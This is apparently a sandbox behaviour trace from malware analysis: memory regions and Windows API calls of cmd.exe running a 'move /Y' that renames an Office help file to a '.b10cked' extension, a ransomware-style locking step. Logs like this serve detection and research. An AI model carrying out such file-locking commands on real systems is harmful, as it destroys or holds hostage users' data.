Region: id = 30017 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 30018 start_va = 0x4b0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 30019 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30020 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30021 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30022 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30023 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30024 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30025 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30026 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30027 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30028 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30029 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30030 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30031 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 30032 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 30033 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 30034 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 30035 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 30036 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 30037 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 30038 start_va = 0x1320000 end_va = 0x13dffff entry_point = 0x1320000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 682 os_tid = 0xf20 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fc7c | out: lpSystemTimeAsFileTime=0x30fc7c*(dwLowDateTime=0xadbc5a80, dwHighDateTime=0x1d440a9)) [0202.873] GetCurrentProcessId () returned 0xe6c [0202.873] GetCurrentThreadId () returned 0xf20 [0202.873] GetTickCount () returned 0x393d5 [0202.873] QueryPerformanceCounter (in: lpPerformanceCount=0x30fc74 | out: lpPerformanceCount=0x30fc74*=25966188580) returned 1 [0202.873] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.873] __set_app_type (_Type=0x1) [0202.873] __p__fmode () returned 0x76b331f4 [0202.874] __p__commode () returned 0x76b331fc [0202.874] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.874] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.874] GetCurrentThreadId () returned 0xf20 [0202.874] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf20) returned 0x38 [0202.874] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.874] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.874] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.874] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.874] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fc0c | out: phkResult=0x30fc0c*=0x0) returned 0x2 [0202.875] VirtualQuery (in: lpAddress=0x30fc43, lpBuffer=0x30fbdc, dwLength=0x1c | out: lpBuffer=0x30fbdc*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.875] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fbdc, dwLength=0x1c | out: lpBuffer=0x30fbdc*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.875] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fbdc, dwLength=0x1c | out: lpBuffer=0x30fbdc*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.875] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fbdc, dwLength=0x1c | out: lpBuffer=0x30fbdc*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.875] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fbdc, dwLength=0x1c | out: lpBuffer=0x30fbdc*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.875] GetConsoleOutputCP () returned 0x1b5 [0202.875] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.875] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.875] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.875] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.876] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.876] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.876] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.876] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.876] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.876] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.876] GetEnvironmentStringsW () returned 0x4c0190* [0202.877] FreeEnvironmentStringsW (penv=0x4c0190) returned 1 [0202.877] GetEnvironmentStringsW () returned 0x4c0190* [0202.877] FreeEnvironmentStringsW (penv=0x4c0190) returned 1 [0202.877] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eb7c | out: phkResult=0x30eb7c*=0x40) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x0, lpData=0x30eb88*=0xb8, lpcbData=0x30eb80*=0x1000) returned 0x2 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x1, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x0, lpData=0x30eb88*=0x1, lpcbData=0x30eb80*=0x1000) returned 0x2 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x0, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x40, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x40, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x0, lpData=0x30eb88*=0x40, lpcbData=0x30eb80*=0x1000) returned 0x2 [0202.877] RegCloseKey (hKey=0x40) returned 0x0 [0202.877] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eb7c | out: phkResult=0x30eb7c*=0x40) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x0, lpData=0x30eb88*=0x40, lpcbData=0x30eb80*=0x1000) returned 0x2 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x1, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x0, lpData=0x30eb88*=0x1, lpcbData=0x30eb80*=0x1000) returned 0x2 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x0, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x9, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x4, lpData=0x30eb88*=0x9, lpcbData=0x30eb80*=0x4) returned 0x0 [0202.877] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eb84, lpData=0x30eb88, lpcbData=0x30eb80*=0x1000 | out: lpType=0x30eb84*=0x0, lpData=0x30eb88*=0x9, lpcbData=0x30eb80*=0x1000) returned 0x2 [0202.877] RegCloseKey (hKey=0x40) returned 0x0 [0202.878] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.878] srand (_Seed=0x5b8863a4) [0202.878] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked\"" [0202.878] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked\"" [0202.878] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.878] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c18f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.878] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.878] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.878] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.878] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.878] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.878] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.878] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.878] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.878] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.878] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.878] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.878] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.879] GetEnvironmentStringsW () returned 0x4c22e0* [0202.879] FreeEnvironmentStringsW (penv=0x4c22e0) returned 1 [0202.879] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.879] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.879] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.879] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.879] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.879] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.879] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.879] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.879] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.879] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.879] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f948 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.879] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f948, lpFilePart=0x30f944 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f944*="Desktop") returned 0x18 [0202.879] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.879] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f6c4 | out: lpFindFileData=0x30f6c4) returned 0x4c0020 [0202.879] FindClose (in: hFindFile=0x4c0020 | out: hFindFile=0x4c0020) returned 1 [0202.879] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f6c4 | out: lpFindFileData=0x30f6c4) returned 0x4c0020 [0202.879] FindClose (in: hFindFile=0x4c0020 | out: hFindFile=0x4c0020) returned 1 [0202.879] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f6c4 | out: lpFindFileData=0x30f6c4) returned 0x4c0020 [0202.880] FindClose (in: hFindFile=0x4c0020 | out: hFindFile=0x4c0020) returned 1 [0202.880] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.880] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.880] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.880] GetEnvironmentStringsW () returned 0x4c2b00* [0202.880] FreeEnvironmentStringsW (penv=0x4c2b00) returned 1 [0202.880] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.880] GetConsoleOutputCP () returned 0x1b5 [0202.881] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.881] GetUserDefaultLCID () returned 0x409 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fa88, cchData=128 | out: lpLCData="0") returned 2 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fa88, cchData=128 | out: lpLCData="0") returned 2 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fa88, cchData=128 | out: lpLCData="1") returned 2 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.881] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.881] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.882] GetConsoleTitleW (in: lpConsoleTitle=0x4b08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.882] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.882] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.882] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.883] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.883] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.883] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.883] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.883] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.883] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.883] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.883] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.886] GetConsoleTitleW (in: lpConsoleTitle=0x30f780, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.886] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.886] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.886] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.886] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.886] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.886] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.886] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.886] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.886] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.886] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.886] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.886] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.886] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.887] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.887] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.887] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.887] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.887] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.887] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.887] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.887] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.887] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.887] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.887] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.887] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.887] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.887] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.887] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.887] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.887] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.887] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.887] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.887] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.887] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.887] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.888] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.888] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.888] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f53c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f534, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f534*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.889] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.890] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.890] _wcsicmp (_String1="MSWINW~2.HXN", _String2=".") returned 63 [0202.890] _wcsicmp (_String1="MSWINW~2.HXN", _String2="..") returned 63 [0202.890] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinw~2.hxn")) returned 0x2022 [0202.890] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4c1e58 | out: 